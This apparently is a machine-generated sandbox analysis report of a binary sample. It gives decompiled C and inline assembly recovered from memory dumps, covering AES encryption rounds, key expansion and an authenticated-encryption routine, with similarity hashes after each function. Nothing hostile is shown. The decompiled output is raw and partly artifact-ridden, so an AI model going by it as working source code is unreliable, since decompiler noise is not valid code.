                                                              									asm("xorps xmm7, xmm7");
                                                              									_t20 = E00B98BE0(_t20, _t28, _t29);
                                                              									asm("movups [edi], xmm2");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("movups [edi+0x30], xmm5");
                                                              									asm("movups [edi+0x40], xmm6");
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L34;
                                                              					}
                                                              					asm("movdqu xmm2, [esi]");
                                                              					asm("movdqu xmm3, [esi+0x10]");
                                                              					asm("movdqu xmm4, [esi+0x20]");
                                                              					asm("movdqu xmm5, [esi+0x30]");
                                                              					asm("movdqu xmm6, [esi+0x40]");
                                                              					asm("movdqu xmm7, [esi+0x50]");
                                                              					_t13 = _t35 + 0x60; // 0x1009e8d
                                                              					_t36 = _t13;
                                                              					_t21 = _t20 - 0x60;
                                                              					while(1) {
                                                              						_t22 = E00B98BE0(_t21, _t28, _t29);
                                                              						_t29 = _t38;
                                                              						_t28 = _t26;
                                                              						_t21 = _t22 - 0x60;
                                                              						__eflags = _t21;
                                                              						if(_t21 < 0) {
                                                              							break;
                                                              						}
                                                              						asm("movups [edi], xmm2");
                                                              						asm("movdqu xmm2, [esi]");
                                                              						asm("movups [edi+0x10], xmm3");
                                                              						asm("movdqu xmm3, [esi+0x10]");
                                                              						asm("movups [edi+0x20], xmm4");
                                                              						asm("movdqu xmm4, [esi+0x20]");
                                                              						asm("movups [edi+0x30], xmm5");
                                                              						asm("movdqu xmm5, [esi+0x30]");
                                                              						asm("movups [edi+0x40], xmm6");
                                                              						asm("movdqu xmm6, [esi+0x40]");
                                                              						asm("movups [edi+0x50], xmm7");
                                                              						_t32 = _t32 + 0x60;
                                                              						asm("movdqu xmm7, [esi+0x50]");
                                                              						_t36 = _t36 + 0x60;
                                                              					}
                                                              					asm("movups [edi], xmm2");
                                                              					asm("movups [edi+0x10], xmm3");
                                                              					asm("movups [edi+0x20], xmm4");
                                                              					asm("movups [edi+0x30], xmm5");
                                                              					asm("movups [edi+0x40], xmm6");
                                                              					asm("movups [edi+0x50], xmm7");
                                                              					_t20 = _t21 + 0x60;
                                                              					__eflags = _t20;
                                                              					if(_t20 == 0) {
                                                              						goto L34;
                                                              					}
                                                              					goto L23;
                                                              				}
                                                              				_t39 = _t29;
                                                              				_t27 = _t28;
                                                              				if(_t20 < 0x60) {
                                                              					L7:
                                                              					asm("movups xmm2, [esi]");
                                                              					_t45 = _t20 - 0x20;
                                                              					if(_t45 < 0) {
                                                              						asm("movups xmm0, [edx]");
                                                              						asm("movups xmm1, [edx+0x10]");
                                                              						_t31 = _t29 + 0x20;
                                                              						asm("xorps xmm2, xmm0");
                                                              						do {
                                                              							asm("aesenc xmm2, xmm1");
                                                              							_t28 = _t28 - 1;
                                                              							__eflags = _t28;
                                                              							asm("movups xmm1, [edx]");
                                                              							_t12 = _t31 + 0x10; // 0xcccccccc
                                                              							_t31 = _t12;
                                                              						} while (_t28 != 0);
                                                              						asm("aesenclast xmm2, xmm1");
                                                              						asm("movups [edi], xmm2");
                                                              					} else {
                                                              						asm("movups xmm3, [esi+0x10]");
                                                              						if(_t45 == 0) {
                                                              							_t20 = E00B98820(_t20, _t28, _t29);
                                                              							asm("movups [edi], xmm2");
                                                              							asm("movups [edi+0x10], xmm3");
                                                              						} else {
                                                              							asm("movups xmm4, [esi+0x20]");
                                                              							_t46 = _t20 - 0x40;
                                                              							if(_t46 < 0) {
                                                              								_t20 = E00B988E0(_t20, _t28, _t29);
                                                              								asm("movups [edi], xmm2");
                                                              								asm("movups [edi+0x10], xmm3");
                                                              								asm("movups [edi+0x20], xmm4");
                                                              							} else {
                                                              								asm("movups xmm5, [esi+0x30]");
                                                              								if(_t46 == 0) {
                                                              									_t20 = E00B989E0(_t20, _t28, _t29);
                                                              									asm("movups [edi], xmm2");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("movups [edi+0x30], xmm5");
                                                              								} else {
                                                              									asm("movups xmm6, [esi+0x40]");
                                                              									asm("xorps xmm7, xmm7");
                                                              									_t20 = E00B98B00(_t20, _t28, _t29);
                                                              									asm("movups [edi], xmm2");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("movups [edi+0x20], xmm4");
                                                              									asm("movups [edi+0x30], xmm5");
                                                              									asm("movups [edi+0x40], xmm6");
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					goto L34;
                                                              				} else {
                                                              					asm("movdqu xmm2, [esi]");
                                                              					asm("movdqu xmm3, [esi+0x10]");
                                                              					asm("movdqu xmm4, [esi+0x20]");
                                                              					asm("movdqu xmm5, [esi+0x30]");
                                                              					asm("movdqu xmm6, [esi+0x40]");
                                                              					asm("movdqu xmm7, [esi+0x50]");
                                                              					_t7 = _t35 + 0x60; // 0x1009e8d
                                                              					_t37 = _t7;
                                                              					_t23 = _t20 - 0x60;
                                                              					L5:
                                                              					_t24 = E00B98B00(_t23, _t28, _t29);
                                                              					_t29 = _t39;
                                                              					_t28 = _t27;
                                                              					_t23 = _t24 - 0x60;
                                                              					if(_t23 >= 0) {
                                                              						asm("movups [edi], xmm2");
                                                              						asm("movdqu xmm2, [esi]");
                                                              						asm("movups [edi+0x10], xmm3");
                                                              						asm("movdqu xmm3, [esi+0x10]");
                                                              						asm("movups [edi+0x20], xmm4");
                                                              						asm("movdqu xmm4, [esi+0x20]");
                                                              						asm("movups [edi+0x30], xmm5");
                                                              						asm("movdqu xmm5, [esi+0x30]");
                                                              						asm("movups [edi+0x40], xmm6");
                                                              						asm("movdqu xmm6, [esi+0x40]");
                                                              						asm("movups [edi+0x50], xmm7");
                                                              						_t32 = _t32 + 0x60;
                                                              						asm("movdqu xmm7, [esi+0x50]");
                                                              						_t37 = _t37 + 0x60;
                                                              						goto L5;
                                                              					}
                                                              					asm("movups [edi], xmm2");
                                                              					asm("movups [edi+0x10], xmm3");
                                                              					asm("movups [edi+0x20], xmm4");
                                                              					asm("movups [edi+0x30], xmm5");
                                                              					asm("movups [edi+0x40], xmm6");
                                                              					asm("movups [edi+0x50], xmm7");
                                                              					_t20 = _t23 + 0x60;
                                                              					if(_t20 == 0) {
                                                              						goto L34;
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              			}
























                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • Opcode ID: 6e92871ad0a21b8d8f968a3ee2c10e49db5235dd4a4bc92c1192d976ed0dae59
                                                              • Instruction ID: d8c1ba3615bab8d2dd397b1ed754021f235347f4380f3281c0374f4895e94579
                                                              • Opcode Fuzzy Hash: 6e92871ad0a21b8d8f968a3ee2c10e49db5235dd4a4bc92c1192d976ed0dae59
                                                              • Instruction Fuzzy Hash: E7A12111D18FD793E7155F3986405B2B7A0FEBA308B11FB58EDD965922DF20B6E4C280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00BA1529() {
                                                              				signed int _t123;
                                                              				signed int _t128;
                                                              				signed int _t129;
                                                              				signed int _t130;
                                                              				void* _t132;
                                                              				signed int _t133;
                                                              				signed int _t138;
                                                              				signed int _t139;
                                                              				signed int _t140;
                                                              				signed int _t141;
                                                              				signed int _t142;
                                                              				signed int _t151;
                                                              				signed int _t152;
                                                              				signed int _t153;
                                                              				unsigned int _t154;
                                                              				signed int _t159;
                                                              				signed int _t160;
                                                              				signed int _t161;
                                                              				intOrPtr _t200;
                                                              				signed int _t202;
                                                              				signed int _t205;
                                                              				signed int _t208;
                                                              				unsigned int _t211;
                                                              				unsigned int _t214;
                                                              				unsigned int _t217;
                                                              				unsigned int _t219;
                                                              				signed int* _t221;
                                                              				signed int* _t223;
                                                              				void* _t241;
                                                              				void* _t243;
                                                              				void* _t245;
                                                              
                                                              				_pop(_t241);
                                                              				_t1 = _t241 - 0x29e9; // 0xa56363c6
                                                              				_t243 = _t1 + 0x880;
                                                              				_t200 =  *((intOrPtr*)(_t245 + 0x1c));
                                                              				if(_t200 == 0x80) {
                                                              					_t123 =  *_t223;
                                                              					_t211 = _t223[3];
                                                              					 *_t221 = _t123;
                                                              					_t221[1] = _t223[1];
                                                              					_t221[2] = _t223[2];
                                                              					_t221[3] = _t211;
                                                              					_t202 = 0;
                                                              					while(1) {
                                                              						_t128 = _t123 ^ ( *(_t243 + (_t211 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t211 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t211 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t211 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t202 * 4);
                                                              						_t221[4] = _t128;
                                                              						_t129 = _t128 ^ _t221[1];
                                                              						_t221[5] = _t129;
                                                              						_t130 = _t129 ^ _t221[2];
                                                              						_t221[6] = _t130;
                                                              						_t221[7] = _t130 ^ _t221[3];
                                                              						_t202 = _t202 + 1;
                                                              						_t221 =  &(_t221[4]);
                                                              						if(_t202 >= 0xa) {
                                                              							break;
                                                              						}
                                                              						_t123 =  *_t221;
                                                              						_t211 = _t221[3];
                                                              					}
                                                              					_t221[0x14] = 0xa;
                                                              					_t132 = 0;
                                                              				} else {
                                                              					if(_t200 == 0xc0) {
                                                              						_t133 =  *_t223;
                                                              						 *_t221 = _t133;
                                                              						_t221[1] = _t223[1];
                                                              						_t221[2] = _t223[2];
                                                              						_t221[3] = _t223[3];
                                                              						_t214 = _t223[5];
                                                              						_t221[4] = _t223[4];
                                                              						_t221[5] = _t214;
                                                              						_t205 = 0;
                                                              						while(1) {
                                                              							_t138 = _t133 ^ ( *(_t243 + (_t214 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t214 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t214 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t214 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t205 * 4);
                                                              							_t221[6] = _t138;
                                                              							_t139 = _t138 ^ _t221[1];
                                                              							_t221[7] = _t139;
                                                              							_t140 = _t139 ^ _t221[2];
                                                              							_t221[8] = _t140;
                                                              							_t141 = _t140 ^ _t221[3];
                                                              							_t221[9] = _t141;
                                                              							if(_t205 == 7) {
                                                              								break;
                                                              							}
                                                              							_t205 = _t205 + 1;
                                                              							_t142 = _t141 ^ _t221[4];
                                                              							_t221[0xa] = _t142;
                                                              							_t221[0xb] = _t142 ^ _t221[5];
                                                              							_t221 =  &(_t221[6]);
                                                              							_t133 =  *_t221;
                                                              							_t214 = _t221[5];
                                                              						}
                                                              						_t221[0x12] = 0xc;
                                                              						_t132 = 0;
                                                              					} else {
                                                              						if(_t200 == 0x100) {
                                                              							 *_t221 =  *_t223;
                                                              							_t221[1] = _t223[1];
                                                              							_t221[2] = _t223[2];
                                                              							_t221[3] = _t223[3];
                                                              							_t217 = _t223[7];
                                                              							_t221[4] = _t223[4];
                                                              							_t221[5] = _t223[5];
                                                              							_t221[6] = _t223[6];
                                                              							_t221[7] = _t217;
                                                              							_t208 = 0;
                                                              							while(1) {
                                                              								_t151 =  *_t221 ^ ( *(_t243 + (_t217 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t217 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t217 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t217 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t208 * 4);
                                                              								_t221[8] = _t151;
                                                              								_t152 = _t151 ^ _t221[1];
                                                              								_t221[9] = _t152;
                                                              								_t153 = _t152 ^ _t221[2];
                                                              								_t221[0xa] = _t153;
                                                              								_t154 = _t153 ^ _t221[3];
                                                              								_t221[0xb] = _t154;
                                                              								if(_t208 == 6) {
                                                              									break;
                                                              								}
                                                              								_t208 = _t208 + 1;
                                                              								_t219 = _t154;
                                                              								_t159 = _t221[4] ^  *(_t243 + (_t219 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t219 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t219 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t243 + (_t219 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018;
                                                              								_t221[0xc] = _t159;
                                                              								_t160 = _t159 ^ _t221[5];
                                                              								_t221[0xd] = _t160;
                                                              								_t161 = _t160 ^ _t221[6];
                                                              								_t221[0xe] = _t161;
                                                              								_t221[0xf] = _t161 ^ _t221[7];
                                                              								_t221 =  &(_t221[8]);
                                                              								_t217 = _t221[7];
                                                              							}
                                                              							_t221[0xc] = 0xe;
                                                              							_t132 = 0;
                                                              						} else {
                                                              							_t132 = 0xfffffffe;
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t132;
                                                              			}



































                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • Opcode ID: c55ec42e37731b7a14bb140ff7fe4e7a6f44855d55ca4aaab8372080e5fa6381
                                                              • Instruction ID: c29d753f4f563c9f23a7a98ede94d15f79ed6f42696223d0a9e5047b8cb2fdf4
                                                              • Opcode Fuzzy Hash: c55ec42e37731b7a14bb140ff7fe4e7a6f44855d55ca4aaab8372080e5fa6381
                                                              • Instruction Fuzzy Hash: 9A8156B5A14B669BD754CF2EC8C045AFBF1FB08310B518A2AD8A583B40D334F965DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 45%
                                                              			E00B9D960(void* __ebp, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, intOrPtr* _a60, intOrPtr _a64, unsigned int _a68) {
                                                              				intOrPtr _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t117;
                                                              				signed int* _t136;
                                                              				signed int* _t144;
                                                              				unsigned int _t152;
                                                              				signed int _t154;
                                                              				signed int _t165;
                                                              				intOrPtr _t178;
                                                              				unsigned int _t187;
                                                              				intOrPtr _t196;
                                                              				signed int _t197;
                                                              				signed int _t199;
                                                              				intOrPtr* _t200;
                                                              				unsigned int _t202;
                                                              				signed int _t205;
                                                              				signed int _t207;
                                                              				unsigned int _t209;
                                                              				void* _t214;
                                                              
                                                              				E00C6BB10(0x38);
                                                              				_t117 =  *0xcc5970; // 0x851ab4dd
                                                              				_a52 = _t117 ^ _t205;
                                                              				_t154 = _a68 >> 4;
                                                              				_t200 = _a60;
                                                              				_t196 =  *((intOrPtr*)(_t200 + 0x48));
                                                              				_t202 = 0;
                                                              				_a4 = _a64;
                                                              				_t178 = _t154 + _t196;
                                                              				asm("adc ebp, eax");
                                                              				_t197 = _t196 + 1;
                                                              				asm("adc eax, 0x0");
                                                              				_t152 =  *(_t200 + 0x4c);
                                                              				_a16 = _t154;
                                                              				_a8 = _t178;
                                                              				_a12 = 0;
                                                              				_t209 = _t152;
                                                              				if(_t209 > 0 || _t209 >= 0 && _t197 > _t178) {
                                                              					L11:
                                                              					_t199 = _a68 & 0x0000000f;
                                                              					if(_t199 > 0) {
                                                              						 *(_t200 + 0x6c) =  *(_t200 + 0x6c) ^  *(_t200 + 0x24);
                                                              						 *(_t200 + 0x68) =  *(_t200 + 0x68) ^  *(_t200 + 0x20);
                                                              						 *(_t200 + 0x74) =  *(_t200 + 0x74) ^  *(_t200 + 0x2c);
                                                              						 *(_t200 + 0x70) =  *(_t200 + 0x70) ^  *(_t200 + 0x28);
                                                              						_a20 = 0;
                                                              						_a24 = 0;
                                                              						_a28 = 0;
                                                              						_a32 = 0;
                                                              						E00C6B7A0(_t152, _t199, _t200,  &_a20, (_t154 << 4) + _a4, _t199);
                                                              						 *((char*)(_t205 + _t199 + 0x30)) = 0x80;
                                                              						_a36 =  *(_t200 + 0x68) ^ _a20;
                                                              						_a40 =  *(_t200 + 0x6c) ^ _a24;
                                                              						_a44 = _a28 ^  *(_t200 + 0x70);
                                                              						_a48 = _a32 ^  *(_t200 + 0x74);
                                                              						 *((intOrPtr*)( *_t200))( &_a36,  &_a20,  *((intOrPtr*)(_t200 + 8)));
                                                              						 *(_t200 + 0x78) =  *(_t200 + 0x78) ^ _a20;
                                                              						 *(_t200 + 0x7c) =  *(_t200 + 0x7c) ^ _a24;
                                                              						 *(_t200 + 0x80) =  *(_t200 + 0x80) ^ _a28;
                                                              						_t178 = _a8;
                                                              						_t205 = _t205 + 0x18;
                                                              						 *(_t200 + 0x84) =  *(_t200 + 0x84) ^ _a32;
                                                              					}
                                                              					 *(_t200 + 0x4c) = _t202;
                                                              					 *((intOrPtr*)(_t200 + 0x48)) = _t178;
                                                              					return E00C69C26(1, _t152, _a52 ^ _t205, _t178, _t199, _t200);
                                                              				} else {
                                                              					do {
                                                              						_t165 = _t197;
                                                              						_t187 = _t152;
                                                              						_v0 = 0;
                                                              						if((_t197 & 0x00000001) == 0) {
                                                              							do {
                                                              								_v0 = _v0 + 1;
                                                              								_t165 = (_t187 << 0x00000020 | _t165) >> 1;
                                                              								_t187 = _t187 >> 1;
                                                              							} while ((_t165 & 0x00000001) == 0);
                                                              						}
                                                              						_push(_v0);
                                                              						_push(_t200);
                                                              						_t136 = E00B9D530();
                                                              						_t207 = _t205 + 8;
                                                              						if(_t136 == 0) {
                                                              							return E00C69C26(0, _t152, _a52 ^ _t207, _t187, _t197, _t200);
                                                              						} else {
                                                              							goto L7;
                                                              						}
                                                              						goto L15;
                                                              						L7:
                                                              						 *(_t200 + 0x68) =  *(_t200 + 0x68) ^  *_t136;
                                                              						 *(_t200 + 0x6c) =  *(_t200 + 0x6c) ^ _t136[1];
                                                              						 *(_t200 + 0x70) =  *(_t200 + 0x70) ^ _t136[2];
                                                              						 *(_t200 + 0x74) =  *(_t200 + 0x74) ^ _t136[3];
                                                              						_t144 = (_t197 -  *((intOrPtr*)(_t200 + 0x48)) - 1 << 4) + _a4;
                                                              						_a20 =  *(_t200 + 0x68) ^  *_t144;
                                                              						_a24 =  *(_t200 + 0x6c) ^ _t144[1];
                                                              						_a28 = _t144[2] ^  *(_t200 + 0x70);
                                                              						_a32 = _t144[3] ^  *(_t200 + 0x74);
                                                              						 *((intOrPtr*)( *_t200))( &_a20,  &_a36,  *((intOrPtr*)(_t200 + 8)));
                                                              						 *(_t200 + 0x78) =  *(_t200 + 0x78) ^ _a36;
                                                              						 *(_t200 + 0x7c) =  *(_t200 + 0x7c) ^ _a40;
                                                              						 *(_t200 + 0x80) =  *(_t200 + 0x80) ^ _a44;
                                                              						 *(_t200 + 0x84) =  *(_t200 + 0x84) ^ _a48;
                                                              						_t202 = _a12;
                                                              						_t205 = _t207 + 0xc;
                                                              						_t197 = _t197 + 1;
                                                              						asm("adc ebx, 0x0");
                                                              						_t214 = _t152 - _t202;
                                                              					} while (_t214 < 0 || _t214 <= 0 && _t197 <= _a8);
                                                              					_t154 = _a16;
                                                              					_t178 = _a8;
                                                              					goto L11;
                                                              				}
                                                              				L15:
                                                              			}

























                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 821ecff688c03416aa1109f5fb434017c5529e2c05978037e75630978224ba5d
                                                              • Instruction ID: c28aeca85b357259e6ed2548071010fc6de8a1487aad55b98cc25d40625daa09
                                                              • Opcode Fuzzy Hash: 821ecff688c03416aa1109f5fb434017c5529e2c05978037e75630978224ba5d
                                                              • Instruction Fuzzy Hash: B671A275A08B009FD358DF2AC581A5BF7E1FFC8310F558A2EE69A87760D631E845CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00B9FF80(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
                                                              				signed char _t100;
                                                              				signed int _t101;
                                                              				signed int _t106;
                                                              				signed int _t108;
                                                              				signed int _t110;
                                                              				unsigned int _t119;
                                                              				signed int _t120;
                                                              				unsigned int _t128;
                                                              				signed int _t153;
                                                              				signed int _t156;
                                                              				signed int* _t160;
                                                              				void* _t246;
                                                              				void* _t248;
                                                              				void* _t250;
                                                              
                                                              				 *(_t250 + 0x14) = __edi;
                                                              				_t100 = __eax ^  *__edi;
                                                              				_t108 = __ebx ^ __edi[1];
                                                              				_t119 = __ecx ^ __edi[2];
                                                              				_t128 = __edx ^ __edi[3];
                                                              				 *((intOrPtr*)(_t250 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
                                                              				do {
                                                              					 *(_t250 + 4) =  *(_t246 + (_t100 & 0x000000ff) * 8) ^  *(_t246 + 3 + (_t128 & 0x000000ff) * 8) ^  *(_t246 + 2 + (_t119 >> 0x00000010 & 0x000000ff) * 8) ^  *(_t246 + 1 + (_t108 >> 0x18) * 8);
                                                              					 *(_t250 + 8) =  *(_t246 + (_t108 & 0x000000ff) * 8) ^  *(_t246 + 3 + (_t100 & 0x000000ff) * 8) ^  *(_t246 + 2 + (_t128 >> 0x00000010 & 0x000000ff) * 8) ^  *(_t246 + 1 + (_t119 >> 0x18) * 8);
                                                              					_t153 = _t108 & 0x000000ff;
                                                              					_t156 = _t100 >> 0x00000010 & 0x000000ff;
                                                              					_t120 = _t119 & 0x000000ff;
                                                              					_t110 = _t108 >> 0x00000010 & 0x000000ff;
                                                              					_t101 = _t100 >> 0x18;
                                                              					_t160 =  &(( *(_t250 + 0x14))[4]);
                                                              					_t100 =  *(_t250 + 4) ^  *_t160;
                                                              					_t108 =  *(_t250 + 8) ^ _t160[1];
                                                              					_t119 =  *(_t246 + (_t119 & 0x000000ff) * 8) ^  *(_t246 + 3 + _t153 * 8) ^  *(_t246 + 2 + _t156 * 8) ^  *(_t246 + 1 + (_t128 >> 0x18) * 8) ^ _t160[2];
                                                              					_t128 =  *(_t246 + (_t128 & 0x000000ff) * 8) ^  *(_t246 + 3 + _t120 * 8) ^  *(_t246 + 2 + _t110 * 8) ^  *(_t246 + 1 + _t101 * 8) ^ _t160[3];
                                                              					 *(_t250 + 0x14) = _t160;
                                                              				} while (_t160 <  *((intOrPtr*)(_t250 + 0x18)));
                                                              				_t248 = _t246 + 0x880 - 0x80;
                                                              				 *(_t250 + 4) =  *(_t248 + (_t100 & 0x000000ff)) & 0x000000ff ^ ( *(_t248 + (_t128 & 0x000000ff)) & 0x000000ff) << 0x00000008 ^ ( *(_t248 + (_t119 >> 0x00000010 & 0x000000ff)) & 0x000000ff) << 0x00000010 ^ ( *(_t248 + (_t108 >> 0x18)) & 0x000000ff) << 0x00000018;
                                                              				 *(_t250 + 8) =  *(_t248 + (_t108 & 0x000000ff)) & 0x000000ff ^ ( *(_t248 + (_t100 & 0x000000ff)) & 0x000000ff) << 0x00000008 ^ ( *(_t248 + (_t128 >> 0x00000010 & 0x000000ff)) & 0x000000ff) << 0x00000010 ^ ( *(_t248 + (_t119 >> 0x18)) & 0x000000ff) << 0x00000018;
                                                              				_t106 =  *(_t250 + 4);
                                                              				asm("adc [ebx], dh");
                                                              				_pop(es);
                                                              				return _t106;
                                                              			}


















                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40a998b215707fbddb308fd1f2a4123efc998ac43f72f41c2de7b8f5ed9dde9e
                                                              • Instruction ID: 109ac1c9b47ed5f56c29ebfcbbf3693180d26f2a509fa10325e4f52af5741e7f
                                                              • Opcode Fuzzy Hash: 40a998b215707fbddb308fd1f2a4123efc998ac43f72f41c2de7b8f5ed9dde9e
                                                              • Instruction Fuzzy Hash: 9C61A33390467B5BDB649E6DD8401A9F7A2BFC4320F5B8A75DC9823642C234EA11DBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%


                                                              C-Code - Quality: 100%
                                                              			E00B9E8F0(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi, void* __ebp, signed int _a4, signed int _a8, signed int* _a20, intOrPtr _a24) {
                                                              				unsigned int _t114;
                                                              				signed int _t115;
                                                              				signed int _t123;
                                                              				signed int _t124;
                                                              				signed char _t134;
                                                              				signed int _t135;
                                                              				unsigned int _t143;
                                                              				signed int _t173;
                                                              				signed int* _t176;
                                                              
                                                              				_a20 = __edi;
                                                              				_t114 = __eax ^  *__edi;
                                                              				_t123 = __ebx ^ __edi[1];
                                                              				_t134 = __ecx ^ __edi[2];
                                                              				_t143 = __edx ^ __edi[3];
                                                              				_a24 = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
                                                              				do {
                                                              					_a4 =  *(__ebp + (_t114 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t123 & 0x000000ff) * 8) ^  *(__ebp + 2 + (_t134 >> 0x00000010 & 0x000000ff) * 8) ^  *(__ebp + 1 + (_t143 >> 0x18) * 8);
                                                              					_t124 = _t123 >> 0x10;
                                                              					_a8 =  *(__ebp + (_t123 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t134 & 0x000000ff) * 8) ^  *(__ebp + 2 + (_t143 >> 0x00000010 & 0x000000ff) * 8) ^  *(__ebp + 1 + (_t114 >> 0x18) * 8);
                                                              					_t135 = _t134 >> 0x18;
                                                              					_t173 = _t114 >> 0x00000010 & 0x000000ff;
                                                              					_t115 = _t114 & 0x000000ff;
                                                              					_t176 =  &(_a20[4]);
                                                              					_t114 = _a4 ^  *_t176;
                                                              					_t123 = _a8 ^ _t176[1];
                                                              					_t134 =  *(__ebp + (_t134 & 0x000000ff) * 8) ^  *(__ebp + 3 + (_t143 & 0x000000ff) * 8) ^  *(__ebp + 2 + _t173 * 8) ^  *(__ebp + 1 + (_t124 & 0x000000ff) * 8) ^ _t176[2];
                                                              					_t143 =  *(__ebp + (_t143 & 0x000000ff) * 8) ^  *(__ebp + 3 + _t115 * 8) ^  *(__ebp + 2 + (_t124 & 0x000000ff) * 8) ^  *(__ebp + 1 + _t135 * 8) ^ _t176[3];
                                                              					_a20 = _t176;
                                                              				} while (_t176 < _a24);
                                                              				_a4 =  *(__ebp + 2 + (_t114 & 0x000000ff) * 8) & 0x000000ff ^  *(__ebp + (_t123 & 0x000000ff) * 8) & 0x0000ff00 ^  *(__ebp + (_t134 >> 0x00000010 & 0x000000ff) * 8) & 0x00ff0000 ^  *(__ebp + 2 + (_t143 >> 0x18) * 8) & 0xff000000;
                                                              				_a8 =  *(__ebp + 2 + (_t123 & 0x000000ff) * 8) & 0x000000ff ^  *(__ebp + (_t134 & 0x000000ff) * 8) & 0x0000ff00 ^  *(__ebp + (_t143 >> 0x00000010 & 0x000000ff) * 8) & 0x00ff0000 ^  *(__ebp + 2 + (_t114 >> 0x18) * 8) & 0xff000000;
                                                              				return _a4 ^ _a20[4];
                                                              			}













                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99376b587692ce240fa4f6e5ff9e9d674aa83cf96403c63a4b33a8538c00fd75
                                                              • Instruction ID: 102b137daa6fba2da2ca3e3e854234aa8e9d866c29ca9db7ac5edf3a86adada7
                                                              • Opcode Fuzzy Hash: 99376b587692ce240fa4f6e5ff9e9d674aa83cf96403c63a4b33a8538c00fd75
                                                              • Instruction Fuzzy Hash: B8618C3391262B9BDB61DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119AC4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%


                                                              C-Code - Quality: 100%
                                                              			E00BA6B80(intOrPtr _a4, signed int** _a8, signed int** _a12, intOrPtr _a16) {
                                                              				signed int** _t71;
                                                              				signed int* _t72;
                                                              				intOrPtr _t73;
                                                              				signed int _t83;
                                                              				signed int _t90;
                                                              				signed int _t93;
                                                              				signed int _t94;
                                                              				signed int _t134;
                                                              				signed int* _t135;
                                                              				signed int _t139;
                                                              				signed int _t140;
                                                              				signed int _t142;
                                                              				signed int _t170;
                                                              				signed int** _t172;
                                                              				signed int* _t173;
                                                              
                                                              				_t71 = _a12;
                                                              				_t73 = _a16;
                                                              				_t172 = _a8;
                                                              				_t140 = _t172[1];
                                                              				_t90 = (_a4 - 1 >> 0x1f) - 1;
